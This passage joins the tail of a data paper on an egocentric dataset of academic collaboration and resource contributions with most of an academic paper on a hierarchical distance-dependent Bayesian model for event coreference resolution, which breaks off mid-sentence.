nicknames which have been masked. Figure 2: The data consist of three interrelated tables. Table ‘nodes’ contains information about all persons. Table ‘collaboration’ is an edgelist of collaboration ties. Table ‘resources’ is a multiplex edgelist of resource flows. 4 Academic Collaboration via Resource Contributions: An Egocentric Dataset • from and two – Person identification numbers referencing the id _ node variable from the nodes table. In other words, a row consisting of values, say, id _ interview = 1, from = 2, to = 3 indicates that researchers 2 and 3 where reported as collaborating in the interview 1. Resource contributions Data about resources engaged by respondents (egos) and their collaborators (alters) to every collaboration were coded based on transcripts. The data are provided in table resources having 1,761 rows and the following four columns: • id _ interview – interview identification number. • from and two – person identification numbers (within each interview) referencing the id _ node variable from the nodes table. • code – a textual code identifying type of re- source contributed by researcher from into the collaboration with researcher to. Resources engaged in collaborations (variable code) were coded with a coding scheme covering different elements of a research process in different disciplines. The scheme consists of 25 codes such as: • ‘Conceptualisation’ – coming up with an idea for a study, providing general theoretical framework; designing a general framework for a study. • ‘Methodology’ – designing methodology for a study. • ‘Investigation’ – conducting research, gather- ing data. • ‘Data analysis’ – data analysis, quantitative as well as qualitative. • ‘Data curation’ – managing and archiving data. • ‘Software creation’ – writing software for re- search process. • ‘Prototype construction’ – building a proto- type that is used in research process. Complete list of codes together with examples of coded interview fragments is available at the website.3 Table 1. Frequencies of gender and scientific degree for egos and alters. Symbol ‘–’(dash) corresponds to missing data. Gender Degree Alter Ego Female Full professor 20 3 Female habilitated PhD 11 5 Female MA 19 3 Female PhD 57 7 Male Full professor 87 8 Male habilitated PhD 23 4 Male MA 28 1 Male PhD 63 9 – MA 3 – – PhD 1 – – – 22 – Selected descriptives As a glimpse into the data, Table 1 shows frequency distribution of gender and scientific degree for egos and alters separately. Figure 3 shows resource flow networks from one of the interviews: Accessing the data The data are available in a GitHub repository at https://recon-icm.github.io/reconqdata as an R package with accessible files in a CSV format. Users can use the data with R by installing the package or download the data files in CSV format using URLs provided in the README file. Discussion We close by discussing potential uses and limitations of the documented data set. We think that the data we share can be used in several contexts with substantive and methodological goals in mind. On the substantive side, the data can be used to address several research questions. For example to analyze co-appearance of different types of resources in collaboration ties – certain 3https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. 5 CONNECTIONS Figure 3: Collaboration (dashed, undirected) and resource flow (solid, directed) ties from one of the interviews. types of resources tend to be contributed together. Further, the resource catalog could be improved and perhaps serve as a starting point for constructing a more standardized survey instrument. On the methodological side, the value of the data set is that it is egocentric and multiplex at the same time. We see active development in statistical models for data collected through egocentric design (Krivitsky and Morris, 2017) as well as in modeling multilayer networks (Krivitsky et al., 2019). The data we share can be a useful test bed for such models. The data have certain limitations. First, it comes from a qualitative study conducted on a quota sample. The obvious limitation is the lack of representativeness in the strict statistical sense. Nevertheless, it is representative in the loose sense – the respondents come from universities from different regions and of different size, from different disciplines and at different stages of scientific career. We believe it does cover the diversity of scientific positions pretty well. Second, the data contain several instances of resource flows between the alters. However, the reliability of this data is rather low. Majority of respondents did not have enough information or were otherwise not confident enough in reporting the resource contributions. Consequently, these data were not collected systematically. Acknowledgments The authors thank (Polish) National Science Cen- tre for support through SONATA grant 2012/07/D/ HS6/01971 for the project Dynamics of Competition and Collaboration in Science: Individual Strategies, Collaboration Networks, and Organizational Hierar- chies (http://recon.icm.edu.pl). References Bojanowski, M. and Czerniawska, D. 2020. Reaching for unique resources: Structural holes and specialization in scientific collaboration networks. Journal of Social Structure. Forthcoming. Preprint available on-line, available at: http://recon.icm.edu.pl/ wp-content/uploads/2019/05/exchange_networks.pdf. 6 Academic Collaboration via Resource Contributions: An Egocentric Dataset Coleman, J. S. 1994. Foundations of Social Theory, Harvard University Press, Cambridge, MA. Czerniawska, D. 2018. Sieci współpracy i wymiany w centrach i na peryferiach. Przypadek polskiej nauki (PhD thesis). University of Warsaw, Warsaw, Poland. Czerniawska, D., Fenrich, W. and Bojanowski, M. 2018. Actors, relations, and networks: Scholarly collaboration beyond bibliometric measures. Polish Sociological Review, 202: 167–185. Krivitsky, P. N. and Morris, M. 2017. Inference for social network models from egocentrically sampled data, with application to understanding persistent racial disparities in HIV prevalence in the US. The Annals of Applied Statistics, 11(1): 427–455. Krivitsky, P. N., Koehly, L. M. and Marcum, C. S. 2019. Exponential-family random graph models for multi-layer networks. SocArXiv, available at: https://doi.org/10.31235/ osf.io/dqe9b (accessed August 14, 2019). Kwiek, M. 2018. Changing European Academics: A Comparative Study of Social Stratification, Work Patterns and Research Productivity. Routledge, London. Kwiek, M. and Szadkowski, K. 2018. Higher education systems and institutions, Poland. In Teixeira, P., Shin, J. C., Amaral, A., Bernasconi, A., Magalhaes, A., Kehm, B. M. and Nokkala, T. (Eds), Encyclopedia of International Higher Education Systems and Institutions, Springer, pp. 1–10, available at: https://doi.org/10.1007/978-94-017- 9553-1_375-1. Laudel, G. 2001. Collaboration, creativity and rewards: why and how scientists collaborate. International Journal of Technology Management, 22(7–8): 762–781. Lewis, J. M., Ross, S. and Holden, T. 2012. The how and why of academic collaboration: disciplinary differences and policy implications. Higher Education, 64(5): 693–708. Leydesdorff, L., Wagner, C., Park, H. W. and Adams, J. 2013. International collaboration in science: the global map and the network, available at: http:// arxiv.org/abs/1301.0801 (accessed August 10, 2019). Moody, J. 2004. The structure of a social science collaboration network: disciplinary cohesion from 1963 to 1999. American Sociological Review, 69(2): 213–238. OECD. 2019. OECD science, technology and R&D statistics: main science and technology indicators, available at: https://data.oecd.org (accessed August 10, 2019). Qin, J., Lancaster, F. W. and Allen, B. 1997. Types and levels of collaboration in interdisciplinary research in the sciences. Journal of the American Society for Information Science, 48(10): 893–916. work_ddz5r4ceerf45fsxq46cai43tu ---- A Hierarchical Distance-dependent Bayesian Model for Event Coreference Resolution Bishan Yang Claire Cardie Department of Computer Science Cornell University {bishan, cardie}@cs.cornell.edu Peter Frazier School of Operations Research and Information Engineering Cornell University pf98@cornell.edu Abstract We present a novel hierarchical distance- dependent Bayesian model for event coref- erence resolution. While existing generative models for event coreference resolution are completely unsupervised, our model allows for the incorporation of pairwise distances be- tween event mentions — information that is widely used in supervised coreference mod- els to guide the generative clustering process- ing for better event clustering both within and across documents. We model the distances between event mentions using a feature-rich learnable distance function and encode them as Bayesian priors for nonparametric cluster- ing. Experiments on the ECB+ corpus show that our model outperforms state-of-the-art methods for both within- and cross-document event coreference resolution. 1 Introduction The task of event coreference resolution consists of identifying text snippets that describe events, and then clustering them such that all event mentions in the same partition refer to the same unique event. Event coreference resolution can be applied within a single document or across multiple documents and is crucial for many natural language process- ing tasks including topic detection and tracking, in- formation extraction, question answering and tex- tual entailment (Bejan and Harabagiu, 2010). More importantly, event coreference resolution is a neces- sary component in any reasonable, broadly applica- ble computational model of natural language under- standing (Humphreys et al., 1997). In comparison to entity coreference resolu- tion (Ng, 2010), which deals with identifying and grouping noun phrases that refer to the same dis- course entity, event coreference resolution has not been extensively studied. This is, in part, because events typically exhibit a more complex structure than entities: a single event can be described via multiple event mentions, and a single event mention can be associated with multiple event arguments that characterize the participants in the event as well as spatio-temporal information (Bejan and Harabagiu, 2010). Hence, the coreference decisions for event mentions usually require the interpretation of event mentions and their arguments in context. See, for example, Figure 1, in which five event mentions across two documents all refer to the same under- lying event: Plane bombs Yida camp. Event: Plane bombs Yida camp Document 1 Document 2 The {Yida refugee camp} {in South Sudan} was bombed {on Thursday}. The {Yida refugee camp} was the target of an air strike {in South Sudan} {on Thursday}. {Two bombs} fell {within the Yida camp}, including {one} {close to the school}. {At least four bombs} were reportedly dropped.{Four bombs} were dropped within just a few moments - {two} {inside the camp itself }, while {the other two} {near the airstrip}. Figure 1: Examples of event coreference. Mutually coreferent event mentions are underlined and in boldface; participant and spatio-temporal information for the high- lighted event is marked by curly brackets. Most previous approaches to event coreference resolution (e.g., Ahn (2006), Chen et al. (2009)) op- erated by extending the supervised pairwise classi- 517 Transactions of the Association for Computational Linguistics, vol. 3, pp. 517–528, 2015. Action Editor: Hwee Tou Ng. Submission batch: 4/2015; Revision batch: 7/2015; Published 9/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. fication model that is widely used in entity corefer- ence resolution (e.g., Ng and Cardie (2002)). In this framework, pairwise distances between event men- tions are modeled via event-related features (e.g., that indicate event argument compatibility), and ag- glomerative clustering is applied to greedily merge event mentions into clusters. A major drawback of this general approach is that it makes hard decisions on the merging and splitting of clusters based on heuristics derived from the pairwise distances. In addition, it only captures pairwise coreference deci- sions within a single document and can not account for signals that commonly appear across documents. More recently, Bejan and Harabagiu (2010; 2014) proposed several nonparametric Bayesian models for event coreference resolution that probabilisti- cally infer event clusters both within a document and across multiple documents. Their method, however, is completely unsupervised, and thus can not en- code any readily available supervisory information to guide the model toward better event clustering. To address these limitations, we propose a novel Bayesian model for within- and cross-document event coreference resolution. It leverages super- vised feature-rich modeling of pairwise coreference relations and generative modeling of cluster distri- butions, and thus allows for both probabilistic in- ference over event clusters and easy incorporation of pairwise linking preferences. Our model builds on the framework of the distance-dependent Chi- nese restaurant process (DDCRP) (Blei and Frazier, 2011), which was introduced to incorporate data de- pendencies into nonparametric clustering models. Here, however, we extend the DDCRP to allow the incorporation of feature-based, learnable dis- tance functions as clustering priors, thus encourag- ing event mentions that are close in meaning to be- long to the same cluster. In addition, we introduce to the DDCRP a representational hierarchy that allows event mentions to be grouped within a document and within-document event clusters to be grouped across documents. To investigate the effectiveness of our approach, we conduct extensive experiments on the ECB+ cor- pus (Cybulska and Vossen, 2014b), an extension to EventCorefBank (ECB) (Bejan and Harabagiu, 2010) and the largest corpus available that contains event coreference annotations within and across documents. We show that integrating pairwise learning of event coreference relations with unsu- pervised hierarchical modeling of event clustering achieves promising improvements over state-of-the- art approaches for within- and cross-document event coreference resolution. 2 Related Work Coreference resolution in general is a difficult natu- ral language processing (NLP) task and typically re- quires sophisticated inferentially-based knowledge- intensive models (Kehler, 2002). Extensive work in the literature focuses on the problem of entity coref- erence resolution and many techniques have been developed, including rule-based deterministic mod- els (e.g. Cardie and Wagstaff (1999), Raghunathan et al. (2010), Lee et al. (2011)) that traverse over mentions in certain orderings and make determin- istic coreference decisions based on all available information at the time; supervised learning-based models (e.g. Stoyanov et al. (2009), Rahman and Ng (2011), Durrett and Klein (2013)) that make use of rich linguistic features and the annotated corpora to learn more powerful coreference functions; and fi- nally, unsupervised models (e.g. Bhattacharya and Getoor (2006), Haghighi and Klein (2007, 2010)) that successfully apply generative modeling to the coreference resolution problem. Event coreference resolution is a more complex task than entity coreference resolution (Humphreys et al., 1997) and also has been relatively less stud- ied. Existing work has adapted similar ideas to those used in entity coreference. Humphreys et al. (1997) first proposed a deterministic cluster- ing mechanism to group event mentions of pre- specified types based on hard constraints. Later ap- proaches (Ahn, 2006; Chen et al., 2009) applied learning-based pairwise classification decisions us- ing event-specific features to infer event clustering. Bejan and Harabagiu (2010; 2014) proposed sev- eral unsupervised generative models for event men- tion clustering based on the hierarchical Dirichlet process (HDP) (Teh et al., 2006). Our approach is related to both supervised clustering and gener- ative clustering approaches. It is a nonparametric Bayesian model in nature but encodes rich linguis- tic features in clustering priors. More recent work 518 modeled both entity and event information in event coreference. Lee et al. (2012) showed that itera- tively merging entity and event clusters can boost the clustering performance. Liu et al. (2014) demon- strated the benefits of propagating information be- tween event arguments and event mentions during a post-processing step. Other work modeled event coreference as a predicate argument alignment prob- lem between pairs of sentences, and trained clas- sifiers for making alignment decisions (Roth and Frank, 2012; Wolfe et al., 2015). Our model also leverages event argument information into the de- cisions of event coreference but incorporates it into Bayesian clustering priors. Most existing coreference models, both for events and entities, focus on solving the within-document coreference problem. Cross-document coreference has attracted less attention due to lack of annotated corpora and the requirement for larger model capac- ity. Hierarchical models (Singh et al., 2010; Wick et al., 2012; Haghighi and Klein, 2007) have been pop- ular choices for cross-document coreference as they can capture coreference at multiple levels of gran- ularities. Our model is also hierarchical, capturing both within- and cross-document coreference. Our model is also closely related to the distance-dependent Chinese Restaurant Process (DDCRP) (Blei and Frazier, 2011). The DDCRP is an infinite clustering model that can account for data dependencies (Ghosh et al., 2011; Socher et al., 2011). But it is a flat clustering model and thus can- not capture hierarchical structure that usually exists in large data collections. Very little work has ex- plored the use of DDCRP in hierarchical clustering models. Kim and Oh (2011; Ghosh et al. (2011) combined a DDCRP with a standard CRP in a two- level hierarchy analogous to the HDP with restricted distance functions. Ghosh et al. (2014) proposed a two-level DDCRP with data-dependent distance- based priors at both levels. Our model is also a two- level DDCRP model but differs in that its distance function is learned using a feature-rich log-linear model. We also derive an effective Gibbs sampler for posterior inference. Action bombs Participant Sudan, Yida refugee camp Time Thursday, Nov 10, 2011 Location South Sudan Table 1: Mentions of event components 3 Problem Formulation We adopt the terminology from ECB+ (Cybulska and Vossen, 2014b), a corpus that extends the widely used EventCorefBank (ECB (Bejan and Harabagiu, 2010)). An event is something that happens or a sit- uation that occurs (Cybulska and Vossen, 2014a). It consists of four components: (1) an Action: what happens in the event; (2) Participants: who or what is involved; (3) a Time: when the event happens; and (4) a Location: where the event happens. We as- sume that each document in the corpus consists of a set of mentions — text spans — that describe event actions, their participants, times, and locations. Ta- ble 1 shows examples of these in the sentence “Su- dan bombs Yida refugee camp in South Sudan on Thursday, Nov 10th, 2011.” In this paper, we also use the term event men- tion to refer to the mention of an event action, and event arguments to refer collectively to mentions of the participants, times and locations involved in the event. Event mentions are usually noun phrases or verb phrases that clearly describe events. Two event mentions are considered coreferent if they refer to the same actual event, i.e. a situation involving a par- ticular combination of action, participants, time and location. Note that in text, not all event arguments are always present for an event mention; they may even be distributed over different sentences. Thus whether two event mentions are coreferential should be determined based on the context. For example, in Figure 1, the event mention dropped in DOCU- MENT 1 corefers with air strike in the same docu- ment as they describe the same event, Plane bombs Yida camp, in the discourse context; it also corefers with dropped in DOCUMENT 2 based on the con- texts of both documents. The problem of event coreference resolution can be divided into two sub-problems: (1) event ex- traction: extracting event mentions and event ar- guments, and (2) event clustering: grouping event 519 mentions into clusters according to their corefer- ence relations. We consider both within- and cross- document event coreference resolution and hypothe- size that leveraging context information from multi- ple documents will improve both within- and cross- document coreference resolution. In the following, we first describe the event extraction step and then focus on the event clustering step. 4 Event Extraction The goal of event extraction is to extract from a text all event mentions (actions) and event arguments (the associated participants, times and locations). One might expect that event actions could be ex- tracted reasonably well by identifying verb groups; and event arguments, by applying semantic role la- beling (SRL) to identify, for example, the Agent and Patient of each predicate. Unfortunately, most SRL systems only handle verbal predicates and so would miss event mentions described via noun phrases. In addition, SRL systems are not designed to capture event-specific arguments. Accordingly, we found that a state-of-the-art SRL system (SwiRL (Sur- deanu et al., 2007)) extracted only 56% of the ac- tions, 76% of participants, 65% of times and 13% of locations for events in a development set of ECB+ based on a head word matching evaluation measure. (We provide dataset details in Section 6.) To produce higher recall, we adopt a supervised approach and train an event extractor using sen- tences from ECB+, which are annotated for event actions, participants, times and locations. Be- cause these mentions vary widely in their length and grammatical type, we employ semi-Markov CRFs (Sarawagi and Cohen, 2004) using the loss- augmented objective of Yang and Cardie (2014) that provides more accurate detection of mention bound- aries. We make use of a rich feature set that includes word-level features such as unigrams, bigrams, POS tags, WordNet hypernyms, synonyms and FrameNet semantic roles, and phrase-level features such as phrasal syntax (e.g., NP, VP) and phrasal embed- dings (constructed by averaging word embeddings produced by word2vec (Mikolov et al., 2013)). Our experiments on the same (held-out) development data show that the semi-CRF-based extractor cor- rectly identifies 95% of actions, 90% of participants, 94% of times and 74% of locations again based on head word matching. Note that the semi-CRF extractor identifies event mentions and event arguments but not relation- ships among them, i.e. it does not associate argu- ments with an event mention. Lacking supervi- sory data in the ECB+ corpus for training an event action-argument relation detector, we assume that all event arguments identified by the semi-CRF ex- tractor are related to all event mentions in the same sentence and then apply SRL-based heuristics to augment and further disambiguate intra-sentential action-argument relations (using the SwiRL SRL). More specifically, we link each verbal event men- tion to the participants that match its ARG0, ARG1 or ARG2 semantic role fillers; similarly, we asso- ciate with the event mention the time and locations that match its AM-TMP and AM-LOC role fillers, re- spectively. For each nominal event mention, we as- sociate those participants that match the possessor of the mention since these were suggested in Lee et al. (2012) as playing the ARG0 role for nominal predi- cates. 5 Event Clustering Now we describe our proposed Bayesian model for event clustering. Our model is a hierarchical exten- sion of the distance-dependent Chinese Restaurant Process (DDCRP). It first groups event mentions within a document to form within-document event cluster and then groups these event clusters across documents to form global clusters. The model can account for the similarity between event mentions during the clustering process, putting a bias toward clusters comprised of event mentions that are simi- lar to each other based on the context. To capture event similarity, we use a log-linear model with rich syntactic and semantic features, and learn the feature weights using gold-standard data. 5.1 Distance-dependent Chinese Restaurant Process The Distance-dependent Chinese Restaurant Pro- cess (DDCRP) is a generalization of the Chinese Restaurant process (CRP) that models distributions over partitions. In a CRP, the generative process can be described by imagining data points as customers 520 in a restaurant and the partitioning of data as tables at which the customers sit. The process randomly samples the table assignment for each customer se- quentially: the probability of a customer sitting at an existing table is proportional to the number of cus- tomers already sitting at that table and the probabil- ity of sitting at a new table is proportional to a scal- ing parameter. For each customer sitting at the same table, an observation can be drawn from a distri- bution determined by the parameter associated with that table. Despite the sequential sampling process, the CRP makes the assumption of exchangeability: the permutation of the customer ordering does not change the probability of the partitions. The exchangeability assumption may not be rea- sonable for clustering data that has clear inter- dependencies. The DDCRP allows the incorporation of data dependencies in infinite clustering, encour- aging data points that are closer to each other to be grouped together. In the generative process, instead of directly sampling a table assignment for each cus- tomer, it samples a customer link, linking the cus- tomer to another customer or itself. The clustering can be uniquely constructed once the customer links are determined for all customers: two customers be- long to the same cluster if and only if one can reach the other by traversing the customer links (treating these links as undirected). More formally, consider a sequence of customers 1, ...,n, and denote a = (a1, ...,an) as the assign- ments of the customer links. ai ∈ {1, . . . ,n} is drawn from p(ai = j|F,α) ∝ { F(i,j), j 6= i α, j = i (1) where F is a distance function and F(i,j) is a value that measures the distance between customer i and j. α is a scaling parameter, measuring self-affinity. For each customer, the observation is generated by the per-table parameters as in the CRP. A DDCRP is said to be sequential if F(i,j) = 0 when i < j, so customers may link only to themselves, and to previous customers. 5.2 A Hierarchical Extension of the DDCRP We can model within-document coreference reso- lution using a sequential DDCRP. Imagining cus- tomers as event mentions and the restaurant as a document, each mention can either refer to an an- tecedent mention in the document or no other men- tions, starting the description of a new event. How- ever, the coreference relations may also exist across documents — the same event may be described in multiple documents. Thus it is ideal to have a two- level clustering model that can group event men- tions within a document and further group them across documents. Therefore we propose a hierar- chical extension of the DDCRP (HDDCRP) that em- ploys a DDCRP twice: the first-level DDCRP links mentions based on within-document distances and the-second level DDCRP links the within-document clusters based on cross-document distances, forming larger clusters in the corpus. The generative process of an HDDCRP can be described using the same “Chinese Restaurant” metaphor. Imagine a collection of documents as a collection of restaurants, and the event mentions in each document as customers entering a restaurant. The local (within-document) event clusters corre- spond to tables. The global (within-corpus) event clusters correspond to menus (tables that serve the same menu belong to the same cluster). The hid- den variables are the customer links and the table links. Figure 2 shows a configuration of these vari- ables and the corresponding clustering structure. Figure 2: A cluster configuration generated by the HDD- CRP. Each restaurant is represented by a rectangle. The small green circles represent customers. The ovals repre- sent tables and the colors reflect the clustering. Each cus- tomer is assigned a customer link (a solid arrow), linking to itself or another customer in the same restaurant. The customer who first sits at the table is assigned a table link (a dashed arrow), linking to itself or another customer in a different restaurant, resulting in the linking of two tables. More formally, the generative process for the HD- DCRP can be described as follows: 1. For each restaurant d ∈ {1, ...,D}, for each 521 customer i ∈ {1, ...,nd}, sample a customer link using a sequential DDCRP: p(ai,d = (j,d)) ∝    Fd(i,j), j < i αd, j = i 0, j > i (2) 2. For each restaurant d ∈{1, ...,D}, for each ta- ble t, sample a table link for the customer (i,d) who first sits at t using a DDCRP: p(ci,d = (j,d ′)) ∝ { F0((i,d),(j,d ′)), j ∈{1, ...,nd′},d′ 6= d α0, j = i,d ′ = d (3) 3. Calculate clusters z(a,c) by traversing all the customer links a and the table links c. Two customers are in the same cluster if and only if there is a path from one to the other along the links, where we treat both table and customer links as undirected. 4. For each cluster k ∈ z(a,c), sample parame- ters φk ∼ G0(λ). 5. For each customer i in cluster k, sample an ob- servation xi ∼ p(·|φzi) where zi = k. F1:D and F0 are distance functions that map a pair of customers to a distance value. We will discuss them in detail in Section 5.4. 5.3 Posterior Inference with Gibbs Sampling The central computation problem for the HDDCRP model is posterior inference — computing the con- ditional distribution of the hidden variables given the observations p(a,c|x,α0,F0,α1:D,F1:D). The pos- terior is intractable due to a combinatorial number of possible link configurations. Thus we approxi- mate the posterior using Markov Chain Monte Carlo (MCMC) sampling, and specifically using a Gibbs sampler. In developing this Gibbs sampler, we first observe that the generative process is equivalent to one that, in step 2 samples a table link for all customers, and then in step 3, when calculating z(a,c), in- cludes only those table links ci,d originating at cus- tomers (i,d) that started a new table, i.e. that chose ai,d = (i,d). The Gibbs sampler for the HDDCRP iteratively samples a customer link for each customer (i,d) from p(a∗i,d|a−(i,d),c,x,λ) ∝ p(a∗i,d)Ha(x,z,λ) (4) where Ha(x,z,λ) = p(x|z(a−(i,d) ∪a∗i,d,c,λ)) p(x|z(a−(i,d),c),λ)) After sampling all the customer links, it samples a table link for all customers (i,d) according to p(c∗i,d|a,c−(i,d),x,λ) ∝ p(c∗i,d)Hc(x,z,λ) (5) where Hc(x,z,λ) = p(x|z(a,c−(i,d) ∪ c∗i,d,λ)) p(x|z(a,c−(i,d)),λ)) For those customers (i,d) that did not start a new table, i.e. with ai,d 6= (i,d), the table link c∗i,d does not affect the clustering, and so Hc(x,z,λ) = 1 in this case. Referring back to the event coreference example in 1, Figure 3 shows an example of variable config- uration for the HDDCRP model and the correspond- ing coreference clusters. a1=1 a2=2 a3=3 a4=4 a5=4 c1=3 c2=2 c3=2 c4=2 c5=5[ina] Figure 3: An example of event clustering and the cor- responding variable assignments. The assignments of a induce tables, or within-document (WD) clusters, and the assignments of c induce menus, or cross-document (CD) clusters. [ina] denotes that the variable is inactive and will not affect the clustering. In implementation, we can simplify the computa- tions of both Ha(x,z,λ) and Hc(x,z,λ) by using the fact that the likelihood under clustering z(a,c) can be factorized as p(x|z(a,c),λ) = ∏ k∈z(a,c) p(xz=k|λ) 522 where xz=k denotes all customers that belong to the global cluster k. p(xz=k|λ) is the marginal proba- bility. It can be computed as p(xz=k|λ) = ∫ p(φ|λ) ∏ i∈z=k p(xi|φ)dφ where xi is the observation associated with cus- tomer i. In our problem, the observation corre- sponds to the lemmatized words in the event men- tion. We model the observed word counts using cluster-specific multinomial distributions with sym- metric Dirichlet priors. 5.4 Feature-based Distance Functions The distance functions F1:D and F0 encode the pri- ors for the clustering distribution, preferring cluster- ing data points that are closer to each other. We con- sider event mentions as the data points and encode the similarity (or compatibility) between event men- tions as priors for event clustering. Specifically, we use a log-linear model to estimate the similarity be- tween a pair of event mentions (xi,xj) fθ(xi,xj) ∝ exp{θT ψ(xi,xj)} (6) where ψ is a feature vector, containing a rich set of features based on event mentions i and j: (1) head word string match, (2) head POS pair, (3) co- sine similarity between the head word embeddings (we use the pre-trained 300-dimensional word em- beddings from word2vec1), (4) similarity between the words in the event mentions (based on term fre- quency (TF) vectors), (5) the Jaccard coefficient be- tween the WordNet synonyms of the head words, and (6) similarity between the context words (a win- dow of three words before and after each event men- tion). If both event mentions involve participants, we consider the similarity between the words in the participant mentions based on the TF vectors, sim- ilarly for the time mentions and the location men- tions. If the SRL role information is available, we also consider the similarity between words in each SRL role, i.e. Arg0, Arg1, Arg2. Training We train the parameter θ using logis- tic regression with an L2 regularizer. We construct the training data by considering all ordered pairs 1https://code.google.com/p/word2vec/ Train Dev Test Total # Documents 462 73 447 982 # Sentences 7,294 649 7,867 15,810 # Annotated event mentions 3,555 441 3,290 7,286 # Cross-document chains 687 47 486 1,220 # Within-document chains 2,499 316 2,137 4,952 Table 2: Statistics of the ECB+ corpus of event mentions within a document, and also all pairs of event mentions across similar documents. To measure document similarity, we collect all men- tions of events, participants, times and locations in each document and compute the cosine similarity between the TF vectors constructed from all the event-related mentions. We consider two documents to be similar if their TF-based similarity is above a threshold σ (we set it to 0.4 in our experiments). After learning θ, we set the within- document distances as Fd(i,j) = fθ(xi,xj), and the across-document distances as F0((i,d),(j,d ′)) = w(d,d′)fθ(xi,d,xj,d′), where w(d,d′) = exp(γsim(d,d′)) captures document similarity where sim(d,d′) is the TF-based sim- ilarity between document d and d′, and γ is a weight parameter. Higher γ leads to a higher effect of document-level similarities on the linking probabilities. We set γ = 1 in our experiments. 6 Experiments We conduct experiments using the ECB+ cor- pus (Cybulska and Vossen, 2014b), the largest available dataset with annotations of both within- document (WD) and cross-document (CD) event coreference resolution. It extends ECB 0.1 (Lee et al., 2012) and ECB (Bejan and Harabagiu, 2010) by adding event argument and argument type an- notations as well as adding more news documents. The cross-document coreference annotations only exist in documents that describe the same seminal event (the event that triggers the topic of the docu- ment and has interconnections with the majority of events from its surrounding textual context (Bejan and Harabagiu, 2014)). We divide the dataset into a training set (topics 1-20), a development set (topics 21-23), and a test set (topics 24-43). Table 2 shows the statistics of the data. We performed event coreference resolution on all possible event mentions that are expressed in the 523 documents. Using the event extraction method de- scribed in Section 4, we extracted 53,429 event men- tions, 43,682 participant mentions, 5,791 time men- tions and 3,836 location mentions in the test data, covering 93.5%, 89.0%, 95.0%, 72.8% of the an- notated event mentions, participants, time and loca- tions, respectively. We evaluate both within- and cross-document event coreference resolution. As in previous work (Bejan and Harabagiu, 2010), we evaluate cross-document coreference resolution by merg- ing all documents from the same seminal event into a meta-document and then evaluate the meta- document as in within-document coreference reso- lution. However, during inference time, we do not assume the knowledge of the mapping of documents to seminal events. We consider three widely used coreference reso- lution metrics: (1) MUC (Vilain et al., 1995), which measures how many gold (predicted) cluster merg- ing operations are needed to recover each predicted (gold) cluster; (2) B3 (Bagga and Baldwin, 1998), which measures the proportion of overlap between the predicted and gold clusters for each mention and computes the average scores; and (3) CEAF (Luo, 2005) (CEAFe), which measures the best alignment of the gold-standard and predicted clusters. We also consider the CoNLL F1, which is the average F1 of the above three measures. All the scores are com- puted using the latest version (v8.01) of the official CoNLL scorer (Pradhan et al., 2014). 6.1 Baselines We compare our proposed HDDCRP model (HDD- CRP) to five baselines: • LEMMA: a heuristic method that groups all event mentions, either within or across docu- ments, which have the same lemmatized head word. It is usually considered a strong baseline for event coreference resolution. • AGGLOMERATIVE: a supervised clustering method for within-document event corefer- ence (Chen et al., 2009). We extend it to within- and cross-document event coreference by performing single-link clustering in two phases: first grouping mentions within doc- uments and then grouping within-document clusters to larger clusters across documents. We compute the pairwise-linkage scores using the log-linear model described in Section 5.4. • HDP-LEX: an unsupervised Bayesian clus- tering model for within- and cross-document event coreference (Bejan and Harabagiu, 2010)2. It is a hierarchical Dirichlet process (HDP) model with the likelihood of all the lem- matized words observed in the event mentions. In general, the HDP can be formulated using a two-level sequential CRP. Our HDDCRP model is a two-level DDCRP that generalizes the HDP to allow data dependencies to be incorporated at both levels3. • DDCRP: a DDCRP model we develop for event coreference resolution. It applies the distance prior in Equation 1 to all pairs of event men- tions in the corpus, ignoring the document boundaries. It uses the same likelihood func- tion and the same log-linear model to learn the distance values as HDDCRP. But it has fewer link variables than HDDCRP and it does not distinguish between the within-document and cross-document link variables. For the same clustering structure, HDDCRP can gener- ate more possible link configurations than DD- CRP. • HDDCRP∗: a variant of the proposed HDDCRP that only incorporates the within-document de- pendencies but not the cross-document depen- dencies. The generative process of HDDCRP∗ is similar to the one described in Section 5.2, ex- cept that in step 2, for each table t, we sample 2We re-implement the proposed HDP-based models: the HDP1f , HDPflat (including HDPflat (LF), (LF+WF), and (LF+WF+SF)) and HDPstruct, but found that the HDPflat with lexical features (LF) performs the best in our experiments. We refer to it as HDP-LEX. 3Note that HDP-LEX is not a special case of HDDCRP be- cause we define the table-level distance function as the distances between customers instead of between tables. In our model, the probability of linking a table t to another table s depends on the distance between the head customer at table t and all other customers who sit at table s. Defining the table-level distance function this way allows us to derive a tractable inference algo- rithm using Gibbs sampling. 524 a cluster assignment ct according to p(ct = k) ∝ { nk, k ≤ K α0, k = K + 1 where K is the number of existing clusters, nk is the number of existing tables that be- long to cluster k, α is the concentration param- eter. And in step 3, the clusters z(a,c) are con- structed by traversing the customer links and looking up the cluster assignments for the ob- tained tables. We also use Gibbs sampling for inference. 6.2 Parameter settings For all the Bayesian models, the reported results are averaged results over five MCMC runs, each for 500 iterations. We found that mixing happens before 500 iterations in all models by observing the joint log-likelihood. For the DDCRP, HDDCRP∗ and HDD- CRP, we randomly initialized the link variables. Be- fore initialization, we assume that each mention be- longs to its own cluster. We assume mentions are ordered according to their appearance within a doc- ument, but we do not assume any particular ordering of documents. We also truncated the pairwise men- tion similarity to zero if it is below 0.5 as we found that it leads to better performance on the develop- ment set. We set α1 = ... = αD = 0.5, α0 = 0.001 for HDDCRP, α0 = 1 for HDDCRP∗, α = 0.1 for DD- CRP, and λ = 10−7. All the hyperparameters were set based on the development data. 6.3 Main Results Table 3 shows the event coreference results. We can see that LEMMA-matching is a strong baseline for event coreference resolution. HDP-LEX provides noticeable improvements, suggesting the benefit of using an infinite mixture model for event cluster- ing. AGGLOMERATIVE further improves the per- formance over HDP-LEX for WD resolution, how- ever, it fails to improve CD resolution. We conjec- ture that this is due to the combination of ineffective thresholding and the prediction errors on the pair- wise distances between mention pairs across docu- ments. Overall, HDDCRP∗ outperforms all the base- lines in CoNLL F1 for both WD and CD evaluation. The clear performance gains over HDP-LEX demon- strate that it is important to account for pairwise mention dependencies in the generative modeling of event clustering. The improvements over AGGLOM- ERATIVE indicate that it is more effective to model mention-pair dependencies as clustering priors than as heuristics for deterministic clustering. Comparing among the HDDCRP-related models, we can see that HDDCRP clearly outperforms DD- CRP, demonstrating the benefits of incorporating the hierarchy into the model. HDDCRP also performs better than HDDCRP∗ in WD CoNLL F1, indicat- ing that incorporating cross-document information helps within-document clustering. We can also see that HDDCRP performs similarly to HDDCRP∗ in CD CoNLL F1 due to 